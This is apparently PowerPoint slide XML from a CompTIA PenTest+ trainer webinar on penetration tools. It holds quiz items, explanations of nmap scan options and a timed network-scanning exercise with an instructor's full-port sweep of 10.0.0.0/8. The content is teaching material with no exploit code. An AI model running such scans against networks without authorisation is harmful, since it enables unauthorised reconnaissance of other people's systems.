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52"/>
  </p:notesMasterIdLst>
  <p:handoutMasterIdLst>
    <p:handoutMasterId r:id="rId53"/>
  </p:handoutMasterIdLst>
  <p:sldIdLst>
    <p:sldId id="296" r:id="rId5"/>
    <p:sldId id="675" r:id="rId6"/>
    <p:sldId id="477" r:id="rId7"/>
    <p:sldId id="299" r:id="rId8"/>
    <p:sldId id="305" r:id="rId9"/>
    <p:sldId id="676" r:id="rId10"/>
    <p:sldId id="677" r:id="rId11"/>
    <p:sldId id="679" r:id="rId12"/>
    <p:sldId id="680" r:id="rId13"/>
    <p:sldId id="716" r:id="rId14"/>
    <p:sldId id="717" r:id="rId15"/>
    <p:sldId id="718" r:id="rId16"/>
    <p:sldId id="719" r:id="rId17"/>
    <p:sldId id="720" r:id="rId18"/>
    <p:sldId id="687" r:id="rId19"/>
    <p:sldId id="689" r:id="rId20"/>
    <p:sldId id="694" r:id="rId21"/>
    <p:sldId id="695" r:id="rId22"/>
    <p:sldId id="696" r:id="rId23"/>
    <p:sldId id="713" r:id="rId24"/>
    <p:sldId id="714" r:id="rId25"/>
    <p:sldId id="715" r:id="rId26"/>
    <p:sldId id="684" r:id="rId27"/>
    <p:sldId id="690" r:id="rId28"/>
    <p:sldId id="697" r:id="rId29"/>
    <p:sldId id="698" r:id="rId30"/>
    <p:sldId id="709" r:id="rId31"/>
    <p:sldId id="710" r:id="rId32"/>
    <p:sldId id="699" r:id="rId33"/>
    <p:sldId id="700" r:id="rId34"/>
    <p:sldId id="708" r:id="rId35"/>
    <p:sldId id="707" r:id="rId36"/>
    <p:sldId id="706" r:id="rId37"/>
    <p:sldId id="705" r:id="rId38"/>
    <p:sldId id="704" r:id="rId39"/>
    <p:sldId id="703" r:id="rId40"/>
    <p:sldId id="702" r:id="rId41"/>
    <p:sldId id="701" r:id="rId42"/>
    <p:sldId id="688" r:id="rId43"/>
    <p:sldId id="691" r:id="rId44"/>
    <p:sldId id="711" r:id="rId45"/>
    <p:sldId id="712" r:id="rId46"/>
    <p:sldId id="721" r:id="rId47"/>
    <p:sldId id="692" r:id="rId48"/>
    <p:sldId id="685" r:id="rId49"/>
    <p:sldId id="686" r:id="rId50"/>
    <p:sldId id="678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xmlns="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8113" autoAdjust="0"/>
  </p:normalViewPr>
  <p:slideViewPr>
    <p:cSldViewPr snapToGrid="0" snapToObjects="1">
      <p:cViewPr varScale="1">
        <p:scale>
          <a:sx n="98" d="100"/>
          <a:sy n="98" d="100"/>
        </p:scale>
        <p:origin x="-408" y="-9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0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17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B6144-CBEE-4E0A-9D32-5228FF5F1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4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A45AEBA5-269E-4070-869B-74F2C8FCF8C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278589" y="140494"/>
            <a:ext cx="816422" cy="7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jstanger@comptia.org" TargetMode="External"/><Relationship Id="rId7" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="mailto:lee@mcwhortertechnologie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tkasem@comptia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wMU4n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altLang="zh-CN" sz="2100" dirty="0" err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PenTest</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="21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+ TTT Session </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="21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8: </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0" smtClean="0"/>
              <a:t>Penetration Tools I</a:t>
            </a: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sz="1200" dirty="0" smtClean="0"/>
              <a:t>06/28/2018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TeachCompTIA</a:t>
            </a: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    #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PenTestPlusTTT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58" y="809308"/>
            <a:ext cx="4136335" cy="1799306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AEA45DC-1BF5-484F-B64D-614193D3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71" y="2204473"/>
            <a:ext cx="2300879" cy="19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as a normal user on a Linux computer run a program and it runs with root user permissions, what permission has been set on this file?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Sudo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SGID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SUID</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="457200" indent="-457200">
              <a:buAutoNum type="alphaLcPeriod"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Root Exec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Lock picking and Lock bypassing are really just the same thing. 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Lock picking and Lock bypassing are really just the same thing. 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tools could not be used to directly move laterally within a compromised network?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RDP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VNC</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="457200" indent="-457200">
              <a:buAutoNum type="alphaLcPeriod"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>SNMP</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="457200" indent="-457200">
              <a:buAutoNum type="alphaLcPeriod"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>SSH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tools could not be used to directly move laterally within a compromised network?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RDP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VNC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SNMP</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="457200" indent="-457200">
              <a:buAutoNum type="alphaLcPeriod"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>SSH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Penetration </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Tools</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>– Domain </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>4.1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927658"/>
            <a:ext cx="88249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 scan (-</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1" smtClean="0"/>
              <a:t>sS</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>) vs. full connect scan (-</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1" smtClean="0"/>
              <a:t>sT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</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1" smtClean="0"/>
              <a:t>sS</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t> target		</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1" smtClean="0"/>
              <a:t>vs</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>		</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1" smtClean="0"/>
              <a:t>nmap</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t> -</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1" smtClean="0"/>
              <a:t>sT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Remember a </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>-</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1" smtClean="0"/>
              <a:t>sS</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t> or Stealth </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>scan sends just a SYN packet and looks at the response. If SYN/ACK is sent back, the port is open, if not it is closed. The scanner then sends an RST to any SYN/ACKs received to end the connection.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Port </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>selection (-p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-p &lt;port range&gt; target</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Like: -p21		-p 21	-p 1-65535	-p U:53,111,137,T:21-25,80,8080</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Also: --exclude-port &lt;port range&gt; to exclude ports from scan (same format)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identification (-</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1" smtClean="0"/>
              <a:t>sV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</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1" smtClean="0"/>
              <a:t>sV</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t> target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Probes </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>open ports to determine service/version </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>information</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Also:</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="2">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>--version-intensity &lt;level&gt;  </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>with level ranging </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>from 0 (light) to 9 (try all probes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OS </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>fingerprinting (-O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–O target</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Enables </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>OS </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>detection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Remember -A does all this and more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511"/>
            <a:ext cx="8229600" cy="3394472"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Disabling ping (-</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1" smtClean="0"/>
              <a:t>Pn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</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1" smtClean="0"/>
              <a:t>Pn</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t> target</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Treats </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>all hosts </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>as if they are </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>online </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>and skips </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>host </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>discovery</a:t>
            </a:r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 smtClean="0"/>
              <a:t>input file (-</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1" smtClean="0"/>
              <a:t>iL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</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1" smtClean="0"/>
              <a:t>iL</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t> &lt;</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1" smtClean="0"/>
              <a:t>inputfilename</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>&gt;</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t> Also: --</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1" smtClean="0"/>
              <a:t>excludefile</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t> &lt;</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1" smtClean="0"/>
              <a:t>exclude_file</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>&gt;</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>These text files contains lists of hosts/networks to scan or exclude</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Timing </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>(-T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-T &lt;0-5&gt; target</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Values range from 0 (Paranoid) to 5 (Insane), the fastest.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2871"/>
            <a:ext cx="8229600" cy="3394472"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Output parameters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oN</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>	Normal output format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outputfile.txt target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oG</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>	</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1" smtClean="0"/>
              <a:t>Grepable</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t> output format  (i.e., for use with the </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1" smtClean="0"/>
              <a:t>grep</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t> utility)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smtClean="0"/>
              <a:t>outputfile.txt target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oX</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>	XML output format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oX</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t> outputfile.xml </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>target</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>-</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1" smtClean="0"/>
              <a:t>oA</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>	Combined format with all three of the above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oA</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1" smtClean="0"/>
              <a:t>outputfile</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>target</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Also: -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smtClean="0"/>
              <a:t>	for s</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>|&lt;</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1" smtClean="0"/>
              <a:t>rIpt</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>kIddi3 format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Note: filename can be whatever, does not have to be outputfile.*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Housekeeping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2506" y="1709136"/>
            <a:ext cx="733423" cy="505888"/>
            <a:chOff x="572648" y="1396987"/>
            <a:chExt cx="1303862" cy="899356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572648" y="1466726"/>
              <a:ext cx="1303862" cy="82961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1396987"/>
              <a:ext cx="927100" cy="8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82506" y="3423040"/>
            <a:ext cx="733423" cy="466660"/>
            <a:chOff x="572648" y="3479705"/>
            <a:chExt cx="1303862" cy="829617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572648" y="3479705"/>
              <a:ext cx="1303862" cy="829617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66690" y="3518974"/>
              <a:ext cx="852034" cy="79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582506" y="2617790"/>
            <a:ext cx="733423" cy="474627"/>
            <a:chOff x="572648" y="2498532"/>
            <a:chExt cx="1303862" cy="843781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72648" y="2498532"/>
              <a:ext cx="1303862" cy="829617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2498532"/>
              <a:ext cx="909638" cy="84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448175" y="2531459"/>
            <a:ext cx="50224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Recording will be distributed within two hours. Slides and homework can be downloaded from the resource widget.  You are able to do this via the recording as well.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175" y="3404952"/>
            <a:ext cx="5022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</a:rPr>
              <a:t>Submit questions via the Q&amp;A. The questions will be answered as submitted throughout the sessions.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175" y="1709135"/>
            <a:ext cx="50224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Unmute your speakers.</a:t>
            </a:r>
          </a:p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Use Chrome if you have issues</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="503631" lvl="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Enable Flash: Chrome://settings/content flash settings enabled</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" xmlns="" val="134500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scenario was shared by one of your fellow classmates and lead us to some interesting discussion, so I’m borrowing it for here.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"You are a </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>pen tester </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>for </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>XYZ </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>corp. Your first task is to find all available devices that live on the 172.x.x.x network, and all devices that live on the 10.x.x.x network. Please include in your report:</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>All Live machines</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Ports open on live machines</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>OS information on all live machines</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Oh and you have only 20 minutes!  Go!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 err="1" smtClean="0"/>
              <a:t>nmap</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0" smtClean="0"/>
              <a:t> commands and option(s) would you use?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201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2327"/>
            <a:ext cx="8229600" cy="3394472"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Short version of my answers:</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>1</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0" smtClean="0"/>
          </a:p>
          <a:p>
            <a:pPr lvl="2"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1" smtClean="0"/>
              <a:t>nmap</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t> -p 1-65535 -o -</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1" smtClean="0"/>
              <a:t>osscan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>-limit -n -T4 --defeat-</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1" smtClean="0"/>
              <a:t>rst</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>-</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1" smtClean="0"/>
              <a:t>ratelimit</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t> --</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>min-</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1" smtClean="0"/>
              <a:t>hostgroup</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t> 4096 --min-parallelism 1024 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>10.0.0.0/8    (with </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>similar </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>run </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>for the </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>172.x.x.x)</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1">
              <a:buNone/>
            </a:pPr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Assuming </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>lab/real-world situation, have multiple terminal windows open, running multiple copies of </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1" smtClean="0"/>
              <a:t>nmap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</a:p>
          <a:p>
            <a:pPr lvl="2"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Potentially script based approach using output of one </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1" smtClean="0"/>
              <a:t>nmap</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t> scan (finding live devices) that becomes the input to another copy of </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1" smtClean="0"/>
              <a:t>nmap</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t> (doing the port scans).</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>4</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="2"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Go Kobayashi </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1" smtClean="0"/>
              <a:t>Maru</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t> and hack their routers/IDS to speed up device discovery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10646"/>
            <a:ext cx="666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Reconnaissance: </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1" smtClean="0"/>
              <a:t>Whois</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1" smtClean="0"/>
              <a:t>Nslookup</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1" smtClean="0"/>
              <a:t>Theharvester</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1" smtClean="0"/>
              <a:t>Shodan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>, Recon-NG, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1" smtClean="0"/>
              <a:t>Censys</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1" smtClean="0"/>
              <a:t>Aircrack</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>-NG, Kismet, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1" smtClean="0"/>
              <a:t>WiFite</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>(2), </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1" smtClean="0"/>
              <a:t>Wireshark</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1" smtClean="0"/>
              <a:t>Hping</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>, SET, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1" smtClean="0"/>
              <a:t>nmap</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>, </a:t>
            </a:r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Enumeration: </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1" smtClean="0"/>
              <a:t>Nslookup</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1" smtClean="0"/>
              <a:t>Wireshark</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1" smtClean="0"/>
              <a:t>Hping</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>, </a:t>
            </a:r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Vulnerability scanning: </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1" smtClean="0"/>
              <a:t>Nikto</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1" smtClean="0"/>
              <a:t>OpenVAS</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1" smtClean="0"/>
              <a:t>SQLmap</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1" smtClean="0"/>
              <a:t>Nessus</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>, W3AF, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>OWASP </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>ZAP, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1" smtClean="0"/>
              <a:t>nmap</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>, </a:t>
            </a:r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Credential </a:t>
            </a:r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Offline </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>password </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>cracking: </a:t>
